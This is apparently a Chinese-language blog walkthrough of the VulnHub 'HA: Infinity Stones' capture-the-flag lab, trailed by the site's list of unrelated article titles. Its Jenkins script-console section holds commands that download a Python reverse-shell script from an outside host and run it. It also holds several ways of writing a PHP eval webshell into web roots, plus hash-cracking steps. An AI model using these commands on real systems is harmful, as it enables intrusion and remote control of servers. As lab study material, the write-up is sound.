下载地址:

https://www.vulnhub.com/entry/ha-infinity-stones,366/

主机扫描:

目录枚举

我们按照密码规则生成字典:gam,%%@@2012

crunch 12 12 -t gam,%%@@2012 -o dict.txt

╰─ aircrack-ng -w dict.txt reality.cap

gamA00fe2012

http://10.10.202.134/gamA00fe2012/realitystone.txt

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

http://10.10.202.134/aether.php

答案的结果为:01101001

http://10.10.202.134/01101001/hints.txt

解密的字符串,我们进行解密下:

这里为脑干算法

http://ctf.ssleye.com/brain.html

okay获取了账户密码,我们登录下8080端口的Jenkins,尝试shell反弹

admin:avengers

这里尝试script console反弹shell无法成功

println "wget http://10.10.202.132/shell.py -P /tmp/".execute().text
println "python /tmp/shell.py".execute().text

具体方法:

直接wget下载back.py反弹shell,如下:
println "wget http://www.nxadmin.com/tools/back.py -P /tmp/".execute().text
println "python /tmp/back.py 10.1.1.111 8080".execute().text

2)多种写webshell方法,如下:
1.wget写webshell
println "wget http://shell.nxadmin.com/data/t.txt -o /var/www/html/media.php".execute().text

2.new File("/var/www/html/media.php").write('<?php @eval($_POST[s3cpu1se]);?>');

3.def webshell = '<?php @eval($_POST[s3cpu1se]);?>'
new File("/var/www/html/media.php").write("$webshell");

4.追加法写webshell
def execute(cmd) {
def proc = cmd.execute()
proc.waitFor()
}
execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/media.php' ] )
execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/media.php' ] )

这里使用调用后台API进行反弹shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

http://10.10.202.134/gamA00fe2012/realitystone.txt

好像是加过密了,我们尝试解密看看

╰─ keepass2john morag.kdbx > morag.hash

╰─ cat morag.hash
morag:$keepass$*2*60000*222*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0

破解获取密文为:princesa

OVER!

最新文章

  1. iOS开发之远程推送
  2. windows系统上安装与使用Android NDK r5 (转)
  3. VS调试在Win7(vista系列)操作系统下 HttpListener拒绝访问解决办法
  4. HDU1863 畅通project 【最小生成树Prim】
  5. inline函数和一般的函数有什么不同
  6. wiki 3143 二叉树的前序、中序及后序遍历
  7. [Q]关于不同比例、不同纸张大小图纸的批量打印
  8. Tcl与Design Compiler (八)——DC的逻辑综合与优化
  9. DevGridControl中GridView排序问题
  10. Mysql --创建用户和授权,备份
  11. 大数据 时间同步问题 解决hbase集群节点HRegionServer启动后自动关闭
  12. 【iCore4 双核心板_FPGA】实验十九:使用JTAT UART终端打印信息
  13. css 中两个class之间没有空格与有空格有什么区别
  14. ZOJ - 3471
  15. C 语言的关键字static 和C++ 的关键字static 有什么区别
  16. Log4Net使用指南之用log4net记录日志到数据库(含有自定义属性)------附Demo例子源代码
  17. redis 数据持久化 aof方式
  18. 【MYSQL命令】mysql基础命令
  19. xampp下载地址 一个集成的易于安装的WEB环境部署包
  20. 使用feign调用服务的时候注意的问题

热门文章

  1. tensorflow的函数
  2. firebug和HTML查看源代码的区别
  3. 程序员的算法课(17)-常用的图算法:深度优先(DFS)
  4. polygon()函数
  5. pngquant——一个好用的png压缩工具
  6. js人民币转大写
  7. 小白学 Python 爬虫(15):urllib 基础使用(五)
  8. hibernate查询方式(四)
  9. luogu P2947 [USACO09MAR]向右看齐Look Up |单调队列
  10. luogu P2650 弹幕考察